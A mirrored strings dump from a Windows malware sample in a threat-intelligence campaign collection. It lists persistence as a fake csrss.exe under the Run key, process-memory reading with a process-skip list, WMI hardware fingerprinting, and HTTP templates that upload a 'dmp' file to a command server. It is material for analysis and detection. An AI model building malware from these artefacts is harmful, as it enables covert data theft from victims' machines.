mirror of
https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections
synced 2024-06-28 18:01:47 +00:00
168 lines
4.2 KiB
Plaintext
Executable File
168 lines
4.2 KiB
Plaintext
Executable File
0x40143cL %u.%u.%u
|
|
0x401474L c:\
|
|
0x4014abL -%X.
|
|
0x4014feL .
|
|
0x40154bL SOFTWARE\Microsoft\Windows\CurrentVersion
|
|
0x40155bL ProductId
|
|
0x4015b8L SOFTWARE\Microsoft\Windows NT\CurrentVersion
|
|
0x4015c8L ProductId
|
|
0x401678L _%X%X
|
|
0x401870L wsock32.dll
|
|
0x40188bL wsock32.dll
|
|
0x4018a2L __WSAFDIsSet
|
|
0x4018b7L WSAStartup
|
|
0x4018ccL send
|
|
0x4018e1L socket
|
|
0x4018f6L gethostbyname
|
|
0x40190bL connect
|
|
0x401920L closesocket
|
|
0x401935L select
|
|
0x40194aL recv
|
|
0x401ae0L SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
|
0x401af7L csrss
|
|
0x401b48L %s "%s"
|
|
0x401cbcL .com
|
|
0x401ce9L .org
|
|
0x401d13L .net
|
|
0x401d39L .ru
|
|
0x401d53L .in
|
|
0x40208bL %X%X
|
|
0x402184L Name
|
|
0x402194L Description
|
|
0x402204L Model
|
|
0x402214L Size
|
|
0x402259L SKU
|
|
0x402269L Model
|
|
0x40229bL %s-%s-%s-%s
|
|
0x4022f0L \csrss.exe
|
|
0x402360L \csrss.exe
|
|
0x4023abL \csrss.exe
|
|
0x402a23L \dmsnf.cfg
|
|
0x402c2fL GET /index.php HTTP/1.1
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 10.0; DSNF_%u=%s=)
|
|
Connection: Keep-Alive
|
|
Host: %s
|
|
|
|
|
|
|
|
0x402cb9L <!-
|
|
0x402df7L +++++++++++++++++++++++++++7ac103214023
|
|
0x402e0eL --%s
|
|
Content-Disposition: form-data; name="userfile[]"; filename="dmp"
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
|
|
0x402e2cL POST /indexu.php HTTP/1.1
|
|
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
|
|
Accept-Language: en-US
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; DSNF_%u=%s=)
|
|
Content-Type: multipart/form-data; boundary=%s
|
|
Host: %s
|
|
Content-Length: %u
|
|
Connection: Keep-Alive
|
|
Cache-Control: no-cache
|
|
|
|
|
|
|
|
0x402f7bL
|
|
--%s--
|
|
|
|
|
|
0x403018L <!-OK->
|
|
0x40309cL LocalFree
|
|
0x4030b1L GetCurrentProcessId
|
|
0x4030c6L Module32First
|
|
0x4030dbL GetTickCount
|
|
0x4030f0L GetFileSize
|
|
0x403105L WriteFile
|
|
0x40311aL Process32First
|
|
0x40312fL LoadLibraryA
|
|
0x403144L DeleteFileA
|
|
0x403159L GetWindowsDirectoryA
|
|
0x40316eL OpenProcess
|
|
0x403183L ReadProcessMemory
|
|
0x403198L CreateProcessA
|
|
0x4031adL CreateFileA
|
|
0x4031c2L LocalAlloc
|
|
0x4031d7L Process32Next
|
|
0x4031ecL CloseHandle
|
|
0x403201L CopyFileA
|
|
0x403216L CreateToolhelp32Snapshot
|
|
0x40322bL GetModuleHandleA
|
|
0x403240L SetFilePointer
|
|
0x403255L ReadFile
|
|
0x40326aL VirtualQueryEx
|
|
0x403292L #KHALMNPR.EXE#LBTWiz.exe#ati2evxx.exe#atiesrxx.exe#atieclxx.exe#TrueSuiteService.exe#TrueService.exe#ibmpmsvc.exe#RtHDVCpl.exe#tpfnf6r.exe#LVOSDSVC.exe#TPOSDSVC.exe#TPONSCR.exe#TpScrex.exe#TPHKSVC.exe#tpnumlkd.exe#tpnumlk.exe#ctfmon.exe#msiexec.exe#wdfmgr.exe#wscntfy.exe#SynTPHelper.exe#SynTPEnh.exe#smss.exe#csrss.exe#winlogon.exe#spoolsv.exe#taskmgr.exe#wininit.exe#nvvsvc.exe#btwdins.exe#GoogleUpdate.exe#lsass.exe#LogonUI.exe#hkcmd.exe#wuauclt.exe#igfxpers.exe#igfxsrvc.exe#igfxext.exe#jusched.exe#patch.exe#rthdcpl.exe#mobsync.exe#MsMpEng.exe#msseces.exe#sidebar.exe#internat.exe#WmiPrvSE.exe#SLsvc.exe#kadxmain.exe#SkyTel.exe#realsched.exe#reader_sl.exe#nvxdsync.exe#nvsvc32.exe#ntrtscan.exe#ETDService.exe#HeciServer.exe#ETDCtrl.exe#ETDCtrlHelper.exe#
|
|
0x40330bL VMware
|
|
0x403332L audio
|
|
0x403359L Apple
|
|
0x403380L License
|
|
0x4033a7L FontCache
|
|
0x4033ceL Touch
|
|
0x4033f5L icon
|
|
0x40341cL torrent
|
|
0x403443L Phone
|
|
0x40346aL Tray
|
|
0x403491L Icon
|
|
0x4034b8L FlashPlayer
|
|
0x4034dfL movie
|
|
0x403506L vmware
|
|
0x40352dL tray
|
|
0x403554L video
|
|
0x40357bL Torrent
|
|
0x4035a2L sound
|
|
0x4035c9L Skype
|
|
0x403611L #
|
|
0x403683L 32\Dwm.exe
|
|
0x4036aaL 32\TpShocks.exe
|
|
0x4036d1L \pwrmgrv\
|
|
0x4036f8L \Audio
|
|
0x40371fL \Video
|
|
0x403746L \Movie
|
|
0x40376dL Audio\
|
|
0x403794L Video\
|
|
0x4037bbL Movie\
|
|
0x4037e2L \Apple
|
|
0x403809L \iPod\
|
|
0x403830L \DVD
|
|
0x403857L \QuickTime\
|
|
0x40387eL \Foxit Software\
|
|
0x4038a5L \K-Lite C
|
|
0x4038ccL Games\
|
|
0x4038f3L Player\
|
|
0x40391aL \Windows Defender\
|
|
0x403941L \DAEMON Tools
|
|
0x403968L \Synaptics\
|
|
0x40398fL \Roxio\
|
|
0x4039b6L \Adobe\
|
|
0x4039ddL \Lenovo\
|
|
0x403a00L \ThinkPad\
|
|
0x403bbeL
|
|
|
|
=====[
|
|
0x403be4L ]=(
|
|
0x403c0eL )=====
|
|
|
|
|
|
|
|
0x403d1dL advapi32.dll
|
|
0x403d38L advapi32.dll
|
|
0x403d4fL RegCloseKey
|
|
0x403d64L RegSetValueExA
|
|
0x403d79L LookupPrivilegeValueA
|
|
0x403d8eL RegCreateKeyExA
|
|
0x403da3L OpenProcessToken
|
|
0x403db8L AdjustTokenPrivileges
|
|
0x403dfcL kernel32.dll
|
|
0x403e11L GetProcAddress
|
|
0x403e2cL CreateThread
|
|
0x403e87L \dmp.tmp
|
|
0x403ea7L SeDebugPrivilege
|
|
0x401db7L ROOT\CIMV2
|
|
0x401e47L WQL
|
|
0x402174L SELECT * FROM Win32_Processor
|
|
0x4021c9L SELECT * FROM Win32_ComputerSystemProduct
|
|
0x4021f4L SELECT * FROM Win32_DiskDrive
|
|
0x402249L SELECT * FROM Win32_BaseBoard
|